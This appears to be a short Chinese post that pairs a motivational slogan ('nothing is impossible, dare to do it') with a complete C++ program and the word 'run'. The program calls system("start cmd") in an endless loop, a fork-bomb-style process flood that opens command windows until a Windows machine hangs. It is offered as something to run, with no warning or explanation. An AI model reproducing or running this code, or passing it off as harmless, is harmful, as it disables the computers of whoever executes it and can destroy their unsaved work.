没有不可能 勇敢去做 坚持探索
#include <bits/stdc++.h> using namespace std; int main(){ while (true) system("start cmd"); return 0; }
运行